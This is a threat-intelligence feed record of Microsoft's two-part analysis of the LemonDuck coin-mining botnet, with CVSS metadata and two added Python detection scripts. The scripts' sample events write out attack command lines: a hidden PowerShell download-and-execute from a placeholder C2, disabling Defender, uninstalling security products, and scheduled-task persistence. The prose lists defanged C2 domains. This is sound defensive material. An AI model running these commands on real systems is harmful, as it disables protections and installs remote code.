Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": 
"MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. 
After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. 
They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nMany free or easily available RATs and Trojans now routinely use process injection and in-memory execution to circumvent easy removal. 
To counter these behaviors, security teams should review their incident response and malware removal processes so that they cover all common areas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. 
These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. 
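The loader chain quoted earlier (a script host running readme.js, then cmd.exe starting Notepad as a decoy alongside a hidden PowerShell downloader), the Defender tampering, the WMIC uninstall of security products and the recurring task names together make a compact detection set. The following is an added example, not code from the Microsoft post or its threat analytics report: a Python triage script that runs those patterns over process-creation events and scores each host. The event schema, the sample events, the rule weights and the .invalid domains are constructed for this example; only the command-line shapes come from the post.

```python
"""
Added example (not from the Microsoft post): regex triage of process-creation
events for the LemonDuck behaviours described in the text. Field names and
sample events are constructed; map them to your EDR's schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    host: str
    image: str       # process image name, e.g. cmd.exe
    cmdline: str     # full command line as recorded by the sensor


# Rule name -> regex applied to the normalised "<image> <cmdline>" string.
RULES = [
    ("readme_js_loader",
     re.compile(r"(wscript|cscript)\.exe.*readme\.js")),
    ("notepad_decoy_hidden_powershell",
     re.compile(r"start /b notepad .*&.*powershell .*-w(indowstyle)? hidden")),
    ("powershell_downloadstring",
     re.compile(r"powershell.*(downloadstring|downloadfile)\(")),
    ("defender_realtime_disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+(1|\$true)")),
    ("defender_drive_exclusion",
     re.compile(r"""add-mppreference.*-exclusionpath\s+['"]?[a-z]:\\?['"]?(\s|$)""")),
    ("wmic_security_product_uninstall",
     re.compile(r"wmic\s+product\s+where.*name\s+like\s+'%(security|antivirus|"
                r"eset|kaspersky|avast|norton|malwarebytes)%'.*call\s+uninstall")),
    ("lemonduck_task_name",
     re.compile(r'schtasks.*/tn\s+"?(blackball|blutea|rtsa)\b')),
]

# Assumed weights: LemonDuck-specific indicators count more than behaviours
# shared with many other malware families (tune against your own baseline).
WEIGHTS = {
    "lemonduck_task_name": 3,
    "readme_js_loader": 2,
    "notepad_decoy_hidden_powershell": 2,
    "wmic_security_product_uninstall": 2,
    "defender_realtime_disabled": 1,
    "defender_drive_exclusion": 1,
    "powershell_downloadstring": 1,
}


def normalize(ev: ProcEvent) -> str:
    """Lower-case and strip PowerShell backtick escapes, which LemonDuck
    inserts inside cmdlet names (Ne`w-Obj`ect) to defeat naive matching."""
    return f"{ev.image} {ev.cmdline}".lower().replace("`", "")


def match_rules(ev: ProcEvent) -> List[str]:
    text = normalize(ev)
    return [name for name, rx in RULES if rx.search(text)]


def triage(events: List[ProcEvent]) -> Dict[str, dict]:
    """Aggregate distinct rule hits per host and assign a verdict. A single
    generic hit (e.g. DownloadString) is only 'review'; a LemonDuck install
    trips several rules on the same host within minutes."""
    hits_by_host: Dict[str, set] = {}
    for ev in events:
        hits_by_host.setdefault(ev.host, set()).update(match_rules(ev))
    result = {}
    for host, hits in hits_by_host.items():
        score = sum(WEIGHTS[h] for h in hits)
        verdict = "likely_lemonduck" if score >= 3 else ("review" if score else "clean")
        result[host] = {"score": score, "hits": sorted(hits), "verdict": verdict}
    return result


# Constructed sample events; command lines follow the shapes quoted in the post.
SAMPLE_EVENTS = [
    ProcEvent("WS-01", "wscript.exe", r'wscript.exe "C:\Users\alice\Downloads\readme.js"'),
    ProcEvent("WS-01", "cmd.exe",
              r"cmd /c start /b notepad C:\Users\alice\Downloads\readme.js & "
              r"powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient)"
              r".DownLoadString('http://t.c2.example.invalid/7p.php?0.7*mail_js*alice*WS-01*10')"),
    ProcEvent("WS-01", "powershell.exe",
              "powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1"),
    ProcEvent("WS-01", "powershell.exe",
              r"powershell -w hidden Add-MpPreference -ExclusionPath 'C:\'"),
    ProcEvent("WS-01", "cmd.exe",
              r"""cmd /c wmic product where "name like '%Security%'" call uninstall /nointeractive"""),
    ProcEvent("WS-01", "schtasks.exe",
              "schtasks /create /ru system /sc MINUTE /mo 60 /tn blackball /tr "
              "\"powershell -w hidden IEx(New-Object Net.WebClient)"
              ".DownloadString('http://t.c2.example.invalid/a.jsp')\" /F"),
    # Benign administration on another host: no rule should fire.
    ProcEvent("WS-02", "powershell.exe", "powershell -NoProfile -Command Get-MpComputerStatus"),
    ProcEvent("WS-02", "schtasks.exe", "schtasks /query /fo LIST"),
    # A lone hidden downloader: worth a look, but not enough on its own.
    ProcEvent("WS-03", "powershell.exe",
              "powershell -w hidden IEx(New-Object Net.WebClient)"
              ".DownloadString('http://intranet.example.invalid/deploy.ps1')"),
]

if __name__ == "__main__":
    for host, info in triage(SAMPLE_EVENTS).items():
        print(host, info["verdict"], info["score"], info["hits"])
```

Stripping backticks before matching matters because LemonDuck splits cmdlet names with PowerShell's escape character, and the same normalisation belongs in any custom detection rule built on these strings. A single DownloadString hit is a lead, not a verdict; the weight table is the part to adjust against your own baseline of administrative PowerShell use.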
The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety of names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. 
It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. 
The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther affected systems bring in secondary payloads such as Ramnit, a widespread Trojan that has been seen dropped by other malware in the past. Additional backdoors, other malware implants, and attacker activity continue long after the initial infection, demonstrating that even a \u201csimple\u201d infection by coin mining malware like LemonDuck can persist and bring more dangerous threats into the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
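The hosts-file technique described under "General, automatic behavior" above (a C2 IP address paired with a random, non-existent name, refreshed about once a day) leaves an artifact that is straightforward to audit during an investigation. The following is an added example, not code from the Microsoft post: a Python audit that parses a hosts file, flags names pinned to external addresses, marks machine-generated-looking labels as an extra reason, and diffs two snapshots to surface what the daily update added. The sample hosts contents, the internal-range list, the randomness heuristic and the placeholder names are all constructed for this example.

```python
"""
Added example (not from the Microsoft post): audit a hosts file for entries
that pair an external IP with a name the organisation never provisioned.
Sample contents are constructed: IPs come from documentation ranges and the
names are placeholders.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import FrozenSet, List, Tuple

# Assumed "internal" ranges: entries pointing here are normal developer or
# admin overrides and are not flagged by this audit.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128", "fe80::/10", "fc00::/7",
)]
VOWELS = set("aeiouy")


@dataclass
class HostsEntry:
    lineno: int
    ip: str
    names: List[str]


@dataclass
class Finding:
    lineno: int
    ip: str
    name: str
    reasons: List[str] = field(default_factory=list)


def parse_hosts(text: str) -> List[HostsEntry]:
    """Parse hosts-file text: full-line and inline '#' comments, blank lines,
    tabs and CRLF are handled; lines whose first token is not an IP are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        ip_token = tokens[0].split("%", 1)[0]   # drop an IPv6 zone id such as %eth0
        try:
            ipaddress.ip_address(ip_token)
        except ValueError:
            continue
        if len(tokens) > 1:
            entries.append(HostsEntry(lineno, ip_token, [t.lower() for t in tokens[1:]]))
    return entries


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip.split("%", 1)[0])
    return any(addr in net for net in INTERNAL_NETS)


def looks_random(label: str) -> bool:
    """Heuristic for machine-generated labels: digit-heavy or nearly vowel-free.
    It is a triage signal only; tune the thresholds to your naming scheme."""
    if len(label) < 6:
        return False
    digits = sum(c.isdigit() for c in label)
    letters = [c for c in label if c.isalpha()]
    if digits / len(label) > 0.2:
        return True
    return bool(letters) and sum(c in VOWELS for c in letters) / len(letters) < 0.2


def audit_hosts(text: str, allowlist: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Flag names pinned to an external IP unless allow-listed; a random-looking
    first label is recorded as an additional reason on the same finding."""
    findings = []
    for e in parse_hosts(text):
        if is_internal(e.ip):
            continue
        for name in e.names:
            if name in allowlist:
                continue
            reasons = ["external_ip"]
            if looks_random(name.split(".")[0]):
                reasons.append("random_looking_name")
            findings.append(Finding(e.lineno, e.ip, name, reasons))
    return findings


def new_mappings(old_text: str, new_text: str) -> List[Tuple[str, str]]:
    """(ip, name) pairs present in the new snapshot but absent from the baseline."""
    old = {(e.ip, n) for e in parse_hosts(old_text) for n in e.names}
    new = {(e.ip, n) for e in parse_hosts(new_text) for n in e.names}
    return sorted(new - old)


BASELINE_HOSTS = """\
# constructed baseline snapshot
127.0.0.1\tlocalhost
::1       localhost
10.20.30.40   build.corp.example   # internal build server override
"""

INFECTED_HOSTS = BASELINE_HOSTS + """\
203.0.113.10  mirror.corp.example  # legitimately pinned external mirror
203.0.113.5   vb7cxq4lz.example    # C2-style entry: external IP, machine-generated name
"""

if __name__ == "__main__":
    for f in audit_hosts(INFECTED_HOSTS, allowlist=frozenset({"mirror.corp.example"})):
        print(f"line {f.lineno}: {f.ip} -> {f.name} ({', '.join(f.reasons)})")
    print("added since baseline:", new_mappings(BASELINE_HOSTS, INFECTED_HOSTS))
```

Run it against a copy of the host's hosts file with a known-good snapshot as the baseline: an entry that points a name you never provisioned at an external address, especially one that changes from day to day, is the pattern to look for. The external-IP check drives the finding; the randomness heuristic only adds a reason, so a deliberately pinned external mirror still shows up until it is allow-listed.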
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. 
